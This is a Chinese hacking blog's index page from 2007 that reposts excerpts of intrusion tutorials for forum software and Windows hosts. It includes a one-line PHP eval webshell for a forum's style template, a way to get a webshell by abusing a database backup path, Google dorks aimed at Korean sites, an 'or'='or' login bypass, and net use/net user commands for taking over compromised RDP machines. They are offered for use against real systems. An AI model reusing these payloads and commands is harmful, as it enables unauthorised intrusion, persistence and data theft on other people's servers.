低调de悟空的博客_博客

进入后台，风格模版设置，在随便一行写代码
记住，这代码必须顶着左边行写，代码前面不可以有任何字符。
EOT;
eval($a);
print <<

例如，我写完某一行为。
.headurl { color:#ffffff;}
EOT;
eval($_POST['a']);
print <<.index_font{color: #3A4F6C;background-color:#EBEBEB; font-weight:bold;padding: 5px;}

而后得到一个shell
http://localhost/bbs/index.php
（由于写到css里，也许有的操作无法返回，但是只要没有什么问题，一般操作都是可

阅读全文>>

类别：默认分类 | 评论(0) | 浏览()

动网8.0后台拿Webshell(转)

2007-10-20 20:10

网论坛一直是国内比较受欢迎的ASP论坛程序，现在最新版本已经到8.0了。很多朋友说进了动网8.0的后台不会拿Webshell。这几天和朋友路人甲研究了一下，发现动网8.0也是可以成功拿到Webshell的，不过限制也比较大！

阅读全文>>

类别：默认分类 | 评论(2) | 浏览()

从后台到webshell的一点思路

2007-10-20 20:07

主要是利用后台对access数据库的“备份数据库”或“恢复数据库”功能，“备份的数据库路径”等变量没有过滤导致可以把任意文件后缀改为asp，从而得到webshell，msssql版的程序就直接应用了access版的代码，导致sql版照样可以利用。具体方法和分析可以参考angel的文章《动网论坛7.0获得WebShell的分析》。据我所知，目前还有很多的asp程序后台存在这样的漏洞，利用方法大同小异。

php+mysql程序

① 利用后台的数据查询功能

在有的程序后台提供直接对mysql数据查询

阅读全文>>

类别：默认分类 | 评论(0) | 浏览()

XSS Phishing - 新式跨站脚本攻击方式

2007-10-18 17:33

老邪的博客

最近跨站脚本漏洞好像比较火，国内的一些比较出名的WEB程序都陆续暴出了跨站脚本漏洞，但是一提到跨站

阅读全文>>

类别：默认分类 | 评论(0) | 浏览()

安全界几位大牛的相片

2007-10-17 21:31

北京会议中心

阅读全文>>

类别：默认分类 | 评论(0) | 浏览()

拿webshell权限的45种方法

2007-10-17 20:46

1,
到GoogLe,搜索一些关键字,edit.asp? 韩国肉鸡为多,多数为MSSQL数据库!

2,
到Google ,site:cq.cn inurl:asp

3,
利用挖掘鸡和一个ASP木马.
文件名是login.asp
路径组是/manage/
关键词是went.asp
用'or'='or'来登陆

4,
关键字：Co Net MIB Ver 1.0网站后台管理系统

帐号密码为 'or'='or'

5.
动感购物系统
inurl:help.asp登陆，如未注册成为会员!

u

阅读全文>>

类别：默认分类 | 评论(0) | 浏览()

3389得肉鸡后命令全集

2007-10-17 20:23

net use $">//ip/ipc$ " " /user:" " 建立IPC空链接
net use $">//ip/ipc$ "密码" /user:"用户名" 建立IPC非空链接
net use h: $">//ip/c$ "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H:
net use h: $">//ip/c$ 登陆后映射对方C：到本地为H:
net use $">//ip/ipc$ /del 删除IPC链接
net use h: /del 删除映射对方到本地的为H:的映射
net user 用户名密码 /add 建立用户
net user guest /active:yes 激活guest用户
net user

阅读全文>>

类别：默认分类 | 评论(0) | 浏览()

[首页] 1 [2] [3] [4] [5] [6] [7] [8] [下一页]

文章分类

默认分类(73)

黑客|渗透(151)

随笔|杂谈(31)

代码|源码(58)

后门|提权(48)

新闻|快讯(7)

密码|算法(6)

资源|下载(48)

漏洞|补丁(39)

安全|红客(10)

文章存档